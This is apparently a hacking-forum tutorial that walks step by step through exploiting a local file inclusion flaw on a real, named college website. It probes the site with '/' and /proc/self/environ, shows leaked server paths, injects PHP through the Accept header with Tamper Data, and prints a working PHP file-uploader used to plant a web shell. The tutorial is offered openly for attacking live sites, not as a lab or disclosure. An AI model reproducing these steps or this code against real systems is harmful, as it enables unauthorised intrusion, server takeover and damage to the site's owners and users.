shell upoading Using LFI by Mr.Cyb3rWarrior (ADesh kolte)

Today I Shown how To Hack A Website using LFI:- Please Do Not Deafce This

               Target Site:- http://www.clginstitute.org

Step:1 Find The LFI Target Point On This Website:-

Target LFI Point:-

http://www.clginstitute.org/?content=newsandevent.php



Step:2 Now Remove All Text After The (./?content=) Now Url looking Like This:-

http://www.clginstitute.org/?content=



Step:3 Put The Back_slash After The (./?content=) Now Url looking Like This:-

http://www.clginstitute.org/?content=/

If You Got Any Error After Puting The (/) Than Chance To Valurnable To LFI IS 80% If You Seen Datas Are Hide On Website, Than Chance To Valurnable To LFI IS 50-50%

Here Is got Error on Website After Put (/)



Warning: include(/): failed to open stream: No such device in /home/clginsti/public_html/callpage.php on line 9



Warning: include(): Failed opening '/' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/clginsti/public_html/callpage.php on line 9











Step:4 Put This Code After The (./?content=) /proc/self/environ Now Url Look Like This:-

 http://www.clginstitute.org/?content=/proc/self/environ

You Seen After Put /proc/self/environ Its Seen Some Seesion Request On Website, That Mins We Are Able To Upload Our Shell.





Step:5 Open The Tamper Data(Mozila Addone) And Start The Tampering The data And refress The Traget Url:-



Step:6 Put Your Uploader Code in tamper Data On The User_code Or Accept, I Put My Uploader Code On The Accept.

And Submit The Request.

Uploader Code:-







<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?>



Step:7 Now You Seen Our Uplader in The Website, Here Upload Your shell And Submit Your Request in Tamper Data.

Step:8 Now Agin Put Your Uploader Code On The Accept, Using The Tamper data During The Shell Uploading Time.

Step:9 Your Shell Got Uploaded On the Server Check  It Now.



Tnx For See My tutorials Please Post Your Positive Comment If You Learn Something New.

And Also Post Your Webhacking tutorials in Fourm.

BY Mr.Cyb3rWarrior (Adesh kolte)